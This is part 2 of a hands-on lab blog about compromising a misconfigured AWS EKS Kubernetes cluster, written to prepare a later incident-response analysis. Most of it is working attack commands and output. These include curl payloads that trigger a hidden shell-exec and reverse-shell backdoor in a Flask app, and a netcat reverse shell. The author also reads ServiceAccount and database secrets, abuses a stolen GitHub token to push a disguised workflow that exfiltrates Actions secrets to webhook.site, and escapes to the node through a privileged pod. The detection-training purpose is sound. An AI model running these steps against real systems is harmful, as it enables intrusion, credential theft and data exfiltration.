Hands-on lab: Full Kubernetes compromise, what will your SOC do about it? (Part 2)
Part 2: Attacking Kuby infrastructure
In this part, we’ll attack Kuby infrastructure. As said in the previous one, the infrastructure is highly misconfigured, but realistic. When there’s no admission controller validating what your DevOps do, things like this can happen, and the weakest part of the chain always gets exploited.
We will have a main scenario that will lead to the exfiltration of the Flasky and the Treasure databases. Let’s see if we can avoid triggering any GuardDuty alert.
- Initial access through the backdoored Flask application
- Discovery of our environment
- Accessing the first Flasky database
- Elevating our privileges through GitHub CI/CD
Initial access through the backdoored Flask application
First, we have to know on which endpoint your Flasky application is listening to.
aws-vault exec ADMIN_ROLE -- kubectl get svc
Let’s imagine we set up a beautiful domain name instead, and that it is listening on a traditional HTTP port. For the lab, it doesn’t matter, but that will be our starting point as attackers.
You can curl it and see how it behaves.
# Attacker machine
$ curl http://XXX.eu-west-3.elb.amazonaws.com:6389/
{
"API healthcheck": "OK"
}
Let’s study a bit more this application. You normally forked the repository in the previous part: https://github.com/Kerberosse/flasky.
This is a dockerized Flask application that was backdoored during its supply chain. This is just a funny initial access that is an excuse to get an initial foothold to our Kubernetes cluster, even though the threat of uncontrolled code getting in production is real (e.g. here, here or here).
The legitimate requests module was changed to point to a certain requets module, which here can be locally found in the same repository.
The call to the requests.get() function inside the route handled by the data() function redirects to the backdoored get() function below.
- The URL in argument is first URL-decoded, and parsed
- If the parsed URL contains a GET parameter called 2c595d8fb8b1534227ffa680234aabd14a978cfb7c840494521f5d22babc9870, its value (which can be an array) is passed to a subprocess.Popen() constructor which will in fine execute a shell command under the web server process
- If the parsed URL contains a GET parameter called 875199797f91a807f6c7a7693fad7eea1be4eaf3139afe7088468548746b83f7, its value (which can be an array) will be used to make a reverse shell towards an attacker-controlled IP:port
- For other requests, the legitimate requests.get() function is called with the url as argument
The “vulnerable” endpoint is dynamic and takes an URL slug ip_address that will be passed to the data() function as a variable. However in Flask, the slug can’t contain any GET parameter and they will be removed. For instance, the following payload will not trigger our backdoor.
# Attacker machine
# Those commands will produce the same output
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8?\
2c595d8fb8b1534227ffa680234aabd14a978cfb7c840494521f5d22babc9870=id"
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8
The guys that backdoored this application thought about this! That’s why, as we’ve seen earlier, the URL is first URL-decoded before processing. We can URL-encode our special characters, so that Flask doesn’t think there are GET parameters, and once in our malicious function, URL-decode them to reveal our payload.
# Attacker machine
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8%3F\
2c595d8fb8b1534227ffa680234aabd14a978cfb7c840494521f5d22babc9870%3Did"
"b'uid=0(root) gid=0(root) groups=0(root)\\n'++b''"
Discovery of our environment
We can then have fun and perform some reconnaissance as root.
# Attacker machine
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8%3F\
2c595d8fb8b1534227ffa680234aabd14a978cfb7c840494521f5d22babc9870%3Dmount"
"b'overlay on / type overlay (rw,relatime,seclabel, \
lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs"
...
"(rw,nosuid,nodev,noexec,relatime,seclabel,size=65536k)\\ntmpfs on \
/run/secrets/kubernetes.io/serviceaccount type tmpfs"
The mount command showed us a few things.
- The container runtime is containerd, and not Docker: this is the default in the recent EKS-optimized AMIs
- We are in a Kubernetes Pod, and the ServiceAccount token is mounted inside the container, which is also the default
We know we want to know which permissions this token has, so we have to find a way to contact the Kubernetes API server with this token.
Let’s first use the second feature of our backdoor, the reverse shell. This is something that is likely to trigger an alert if you have a good EDR solution, since a web server shouldn’t be spawning an interactive bash session. We could have spent more time fine-tuning our backdoor to natively interact with the OS through Python primitives, but this is a lab and I don’t have time for this!
# Attacker machine (listener 1)
$ nc -nlv 0.0.0.0 14573
# Attacker machine (client)
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8\
%3F875199797f91a807f6c7a7693fad7eea1be4eaf3139afe7088468548746b83f7\
%3D<LISTENER_IP>%26875199797f91a807f6c7a7693fad7eea1be4eaf3139afe7088468548746b83f7\
%3D<LISTENER_PORT>"
# Attacker machine (listener 1)
$ whoami
root
Back to our goal, EKS API is exposed through a public endpoint in this lab, but the attacker doesn’t know it (yet) with its current rights. The easiest way to go will be through the internal endpoint accessible from within our VPC. Let’s authenticate to it with the ServiceAccount token, mounted under /var/run/secrets/kubernetes.io/serviceaccount/token, and see which permissions it has.
# Attacker machine (listener 1)
$ echo $KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS
172.20.0.1:443
# The CA used to authenticate the API server (TLS) can also be found under
# /var/run/secrets/kubernetes.io/serviceaccount/ca.crt if you want
$ curl -k -H "Authorization: Bearer `cat /var/run/secrets/kubernetes.io/serviceaccount/token`" -X GET https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "ip-XXX.eu-west-3.compute.internal:443"
}
]
}
Let’s now install kubectl to ease our communication with this API server.
# Attacker machine (listener 1)
$ cd $(mktemp -d)
$ pwd
/tmp/tmp.mhFFQJSMJY
$ curl -LO https://dl.k8s.io/release/$(curl -Ls https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl
$ chmod +x ./kubectl
$ ./kubectl config set-cluster cfc --server=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
$ ./kubectl config set-context cfc --cluster=cfc
$ ./kubectl config set-credentials user --token=`cat /var/run/secrets/kubernetes.io/serviceaccount/token`
$ ./kubectl config set-context cfc --user=user
$ ./kubectl config use-context cfc
$ ./kubectl auth can-i --list
Warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
namespaces [] [] [get watch list]
pods [] [] [get watch list]
secrets [] [] [get watch list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
That’s a lot of suspicious commands. If there was an EDR, or if outbound traffic was restricted from the Pod, I would have been in trouble. But I would have also set up a SOCKS proxy in the backdoor in the first place to leave all my tooling at home, but this topic will be discussed in the next part where I’ll share a few detection ideas for more advanced scenarios.
Accessing the first Flasky database
This ServiceAccount seems to have a lot of rights, but in read access only. Let’s explore the cluster…
# Attacker machine (listener 1)
$ ./kubectl get namespaces
NAME STATUS AGE
default Active 5h
kube-node-lease Active 5h
kube-public Active 5h
kube-system Active 5h
runners Active 4h18m
treasure Active 4h19m
$ ./kubectl get secrets
NAME TYPE DATA AGE
flasky-secret Opaque 3 4h28m
$ ./kubectl get secrets flasky-secret -o json
{
"apiVersion": "v1",
"data": {
"flasky_password": "Rmxhc2t5OWYwYzAzZjIzZTUyZWRiNmRhMTcwMGMzMTEzZDE1MzJiZGFjNGJiNjgxNTYxOTgyNmU4NThkNjZiMjE1ODViMg==",
"flasky_user": "Zmxhc2t5",
"root_password": "VG9wU2VjcmV0OWYwYzAzZjIzZTUyZWRiNmRhMTcwMGMzMTEzZDE1MzJiZGFjNGJiNjgxNTYxOTgyNmU4NThkNjZiMjE1ODViMg=="
},
"kind": "Secret",
"metadata": {
"annotations": {
"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"flasky-secret\",\"namespace\":\"default\"},\"stringData\":{\"flasky_password\":\"Flasky9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2\",\"flasky_user\":\"flasky\",\"root_password\":\"TopSecret9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2\"},\"type\":\"Opaque\"}\n"
},
"creationTimestamp": "2024-06-22T08:46:05Z",
"name": "flasky-secret",
"namespace": "default",
"resourceVersion": "6481",
"uid": "5e8927c7-f12e-4f03-9845-3479df76f9d0"
},
"type": "Opaque"
}
$ ./kubectl get secrets -n runners
NAME TYPE DATA AGE
github-pat Opaque 1 4h25m
kuby-runner-set-7d446b46-listener Opaque 1 4h25m
kuby-runner-set-7d446b46-listener-config Opaque 1 4h25m
sh.helm.release.v1.arc.v1 helm.sh/release.v1 1 4h26m
sh.helm.release.v1.kuby-runner-set.v1 helm.sh/release.v1 1 4h26m
$ ./kubectl get secrets github-pat -o json -n runners
{
"apiVersion": "v1",
"data": {
"github_token": "XXX"
},
"kind": "Secret",
"metadata": {
"annotations": {
"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"github-pat\",\"namespace\":\"runners\"},\"stringData\":{\"github_token\":\"XXX\"},\"type\":\"Opaque\"}\n"
},
"creationTimestamp": "2024-06-22T08:49:35Z",
"name": "github-pat",
"namespace": "runners",
"resourceVersion": "7201",
"uid": "e991825b-04c2-4347-b10e-4d9da23a99ac"
},
"type": "Opaque"
}
$ ./kubectl get secrets -n treasure
NAME TYPE DATA AGE
treasure-secret Opaque 3 4h27m
$ ./kubectl get secrets -n treasure -o json
{
"apiVersion": "v1",
"items": [
{
"apiVersion": "v1",
"data": {
"root_password": "U3VwZXJUcmVhc3VyZTlmMGMwM2YyM2U1MmVkYjZkYTE3MDBjMzExM2QxNTMyYmRhYzRiYjY4MTU2MTk4MjZlODU4ZDY2YjIxNTg1YjI=",
"treasure_password": "VHJlYXN1cmU5ZjBjMDNmMjNlNTJlZGI2ZGExNzAwYzMxMTNkMTUzMmJkYWM0YmI2ODE1NjE5ODI2ZTg1OGQ2NmIyMTU4NWIy",
"treasure_user": "dHJlYXN1cmVfdXNlcg=="
},
"kind": "Secret",
"metadata": {
"annotations": {
"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"treasure-secret\",\"namespace\":\"treasure\"},\"stringData\":{\"root_password\":\"SuperTreasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2\",\"treasure_password\":\"Treasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2\",\"treasure_user\":\"treasure_user\"},\"type\":\"Opaque\"}\n"
},
"creationTimestamp": "2024-06-22T08:48:20Z",
"name": "treasure-secret",
"namespace": "treasure",
"resourceVersion": "6916",
"uid": "6111bd2f-75f4-47ce-9325-1ec75f54a3ed"
},
"type": "Opaque"
}
],
"kind": "List",
"metadata": {
"resourceVersion": ""
}
}
We have a lot of secrets! Let’s see if we can connect to the Flasky database with those credentials.
# Attacker machine (listener 1)
$ ./kubectl describe pods flasky-db-56d5ffdb7b-9mbwg
Name: flasky-db-56d5ffdb7b-9mbwg
Namespace: default
Priority: 0
Service Account: default
Node: ip-10-0-1-121.eu-west-3.compute.internal/10.0.1.121
Start Time: Sat, 22 Jun 2024 08:46:05 +0000
Labels: app=flasky-db
pod-template-hash=56d5ffdb7b
Annotations: <none>
Status: Running
IP: 10.0.1.108
$ apt install netcat-traditional
$ nc -zvw 1 10.0.1.108 3306
10-0-1-108.flasky-db.default.svc.cluster.local [10.0.1.108] 3306 (mysql) open
Great (not surprising)! One out of two. What about the other one?
# Attacker machine (listener 1)
$ ./kubectl describe pods -n treasure
Name: treasure-db-5ff5d5c765-m8vx9
Namespace: treasure
Priority: 0
Service Account: default
Node: ip-10-0-1-121.eu-west-3.compute.internal/10.0.1.121
Start Time: Sat, 22 Jun 2024 08:48:20 +0000
Labels: app=treasure-db
pod-template-hash=5ff5d5c765
Annotations: <none>
Status: Running
IP: 10.0.1.103
$ nc -zvw 1 10.0.1.103 3306
# Timeout! Dough!
We’re not really surprised as there’s a NetworkPolicy preventing us from getting inside the treasure namespace. We will have to find a way to elevate our privileges.
Elevating our privileges through GitHub CI/CD
Let’s see what we can do with that GitHub Personal Access Token. But we need to see first to which account it refers to! There are multiple ways, like checking the .git directory in the Flasky application, but we’ll instead check what is the configuration of those runners, which must also include the repository they’re in.
# Attacker machine (listener 1)
$ ./kubectl describe pods kuby-runner-set-7d446b46-listener -n runners
Name: kuby-runner-set-7d446b46-listener
Namespace: runners
Priority: 0
Service Account: kuby-runner-set-7d446b46-listener
Node: ip-10-0-1-121.eu-west-3.compute.internal/10.0.1.121
Start Time: Sat, 22 Jun 2024 08:49:40 +0000
Labels: actions.github.com/organization=XXX
actions.github.com/repository=flasky
actions.github.com/scale-set-name=kuby-runner-set
actions.github.com/scale-set-namespace=runners
app.kubernetes.io/component=runner-scale-set-listener
app.kubernetes.io/instance=kuby-runner-set
app.kubernetes.io/managed-by=Helm
app.kubernetes.io/name=kuby-runner-set
app.kubernetes.io/part-of=gha-runner-scale-set
app.kubernetes.io/version=0.9.2
helm.sh/chart=gha-rs-0.9.2
Annotations: <none>
Status: Running
IP: 10.0.1.123
Great! We can reconstruct the repository location from the organization and repository labels. Let’s try to authenticate to it, but not from the Pod as it might be monitored, and retrieve all Actions secrets.
# Attacker machine (client)
$ curl -H "Accept: application/vnd.github+json" \
-H "Authorization: Bearer ghp_XXX" \
-H "X-GitHub-Api-Version: 2022-11-28" \
https://api.github.com/repos/XXX/flasky/actions/secrets
{
"total_count": 5,
"secrets": [
{
"name": "AWS_ACCESS_KEY_ID",
"created_at": "2024-06-21T17:03:45Z",
"updated_at": "2024-06-22T09:00:05Z"
},
{
"name": "AWS_REGION_ID",
"created_at": "2024-06-21T17:04:09Z",
"updated_at": "2024-06-21T17:04:09Z"
},
{
"name": "AWS_ROLE_TO_ASSUME",
"created_at": "2024-06-21T17:05:24Z",
"updated_at": "2024-06-21T17:05:24Z"
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"created_at": "2024-06-21T17:03:58Z",
"updated_at": "2024-06-22T09:00:18Z"
},
{
"name": "K8S_EKS_NAME",
"created_at": "2024-06-21T17:05:39Z",
"updated_at": "2024-06-21T17:05:39Z"
}
]
}
Juicy! They are certainly the credentials for the IAM role the runners assume to perform actions on the Kubernetes cluster (remember we authenticate through EKS API only). Runners usually have a lot of rights since they are the ones managing the CI/CD pipeline. But we can’t directly retrieve Actions secrets from the API, so we’ll have to find a workaround.
We know workflows can access them, and we may have the rights to add a custom one that would exfiltrate them. Let’s do it: clone the repository locally with the GitHub PAT and add a workflow.
# Attacker machine (client)
$ git clone https://github.com/XXX/flasky.git
Username: XXX
Password: ghp_XXX
$ cd flasky
$ vi .github/workflows/haha.yaml
The exfiltration is set up at the 4th step of the job. Here I use https://webhook.site which generates me a convenient HTTPS listener that will receive our credentials in the POST body, as defined by my workflow.
Let’s push this back to our repository.
# Attacker machine (client)
git add .github/workflows/haha.yaml
# Let's commit with the run-name of the legitimate workflow
# Since our malicious one doesn't have one, the display name
# in the GUI will be the commit name... !
git commit -m "Build & deploy Flasky"
git push https://github.com/XXX/flasky.git
After a few minutes, you should have received all the secrets in your HTTPS listener. You can check how your custom workflow is doing by checking its status in the Actions tab of your repository. Notice the GUI displays the same run title between the legitimate and the malicious one.
Great, we have the runners IAM credentials. We know we can only access the cluster either through the EKS public endpoint with the allowed public IP address, or internally from within the VPC. We’ll use those credentials from within the compromised Pod.
Back to our reverse shell, let’s setup our AWS credentials.
# Attacker machine (listener 1)
$ mkdir /root/.aws
$ cd /root/.aws
We will download the credentials and config files from our previously setup webhook, by setting a custom response. If you use https://webhook.site, from your webhook, click on Edit and setup first the credentials file.
# Attacker machine (listener 1)
$ curl -o credentials https://webhook.site/XXX
For the config file, you can use the following content.
[default]
region=eu-west-3
output=json
[profile user]
role_arn=arn:aws:iam::XXX:role/kuby-GHRole
source_profile=default
region=eu-west-3
output=json
# Attacker machine (listener 1)
$ curl -o config https://webhook.site/XXX
$ export AWS_DEFAULT_PROFILE=user
Let’s now setup aws-cli.
# Attacker machine (listener 1)
$ cd ..
$ curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
$ unzip awscliv2.zip
$ ./aws/install --bin-dir /usr/local/bin --install-dir /usr/local/aws-cli
# Authenticate & update the kubeconfig
$ aws eks update-kubeconfig --name kuby
Your AWS credentials are now set and you’re ready to use kubectl with the GitHub runner IAM role. Come back to where you installed kubectl previously (it should be a temporary directory).
# Attacker machine (listener 1)
$ ./kubectl auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
deployments.apps [] [] [get list watch update create patch delete]
statefulsets.apps [] [] [get list watch update create patch delete]
configmaps [] [] [get watch list update create patch delete]
persistentvolumeclaims [] [] [get watch list update create patch delete]
pods/exec [] [] [get watch list update create patch delete]
pods/log [] [] [get watch list update create patch delete]
pods/portforward [] [] [get watch list update create patch delete]
pods [] [] [get watch list update create patch delete]
secrets [] [] [get watch list update create patch delete]
services [] [] [get watch list update create patch delete]
Okay, we can basically do everything. The most simple thing is to retrieve the database content through kubectl exec.
# Attacker machine (listener 1)
$ ./kubectl get pods -n treasure
NAME READY STATUS RESTARTS AGE
treasure-db-5ff5d5c765-m8vx9 1/1 Running 0 6h5m
$ ./kubectl exec treasure-db-5ff5d5c765-m8vx9 -n treasure -- mysql \
-u treasure_user -pTreasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2 \
-e "show databases;"
Database
information_schema
performance_schema
treasure
$ ./kubectl exec treasure-db-5ff5d5c765-m8vx9 -n treasure -- mysql \
-u treasure_user -pTreasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2 \
-e "use treasure; show tables;"
Tables_in_treasure
users
$ ./kubectl exec treasure-db-5ff5d5c765-m8vx9 -n treasure -- mysql \
-u treasure_user -pTreasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2 \
-e "use treasure; select * from users;"
id username email password
1 admin admin@treasure.local 44b68f9bd1c1569c13c9938c2cc7189c4bbe433c0e08f1042e49eedf5b4b1b6b
2 paul paul@flasky.local 9d1f6ff2a1b98f02ee11fa9f26b40df9a2aad227d3f181e56be0b29210cfeb2a
3 pietra pietra@flasky.local c932581bce88b1d474cc2f62b06497f691a8890969431716b251671e8ae1e8d4
4 irina irina@flasky.local 9c5f9940d768ff35a2a936b2a17be905a80c1bda4771e4d0c08f4ca3e043bf53
5 wilson wilson@flasky.local 05e12663b9a18e052ccb547be8e3e5d45e2996f57836936953d1aa66625d47cb
6 john john@flasky.local 8ffebb31eb69b530b6691d24cb1124d166293f321150d6f255ee2be0cf81dd64
7 tyler tyler@flasky.local d295ca77498a9cdc09c852f39acf96822773adb52396d2ba6dc54bc4a4bb9bf5
8 lisa lisa@flasky.local 618f28b220987aed20593c3363392c583fb3097e4357145bdecab2af31a78dd8
Voilà!
Let’s say we want to go a bit further, and have code execution in the worker node itself (aka. pod escape). With those rights, we could easily create a custom privileged pod with bind mounts to the host filesystem. This is the classic way out with that much privileges. Let’s do this, just for fun.
In your webhook, change the response content to the following file. We’re going to create a pod that will launch a reverse shell towards us with new privileges. Setup the first argument of the entrypoint as your attacker IP, and the second one as the port you’re listening to.
Prepare a new listener in your attacker machine, and create the pod.
# Attacker machine (listener 2)
$ nc -nlv 0.0.0.0 65000
# Attacker machine (listener 1)
$ curl -o pod.yaml https://webhook.site/XXX
$ ./kubectl apply -f pod.yaml
# Attacker machine (listener 2)
$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 15:07 ? 00:00:00 /usr/local/bin/ncat XXX 65000 -e /bin/bash
root 8 1 0 15:07 ? 00:00:00 /bin/bash
root 9 8 0 15:09 ? 00:00:00 ps -ef
$ chroot /host /bin/bash
$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 08:14 ? 00:00:14 /usr/lib/systemd/systemd --switched-root --system --deserialize=32
root 2 0 0 08:14 ? 00:00:00 [kthreadd]
root 3 2 0 08:14 ? 00:00:00 [rcu_gp]
root 4 2 0 08:14 ? 00:00:00 [rcu_par_gp]
root 5 2 0 08:14 ? 00:00:00 [slub_flushwq]
...
By chroot-ing a bash shell inside the mounted host filesystem, we can retrieve all processes from the worker node.
This is the end of our attack. Feel free to imagine all kind of variations, and I guess more articles will come confronting attack vectors with their associated detection strategy (in Kubernetes, or more classical environments).
In the next part, we’ll review the incident response part with what we have.
- What did Amazon GuardDuty natively detect?
- What can be retrieved from the kill chain by analyzing all relevant logs?
- What could have been improved?